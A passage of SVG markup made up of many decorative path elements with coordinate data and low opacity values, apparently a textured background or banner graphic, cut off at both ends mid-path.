6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.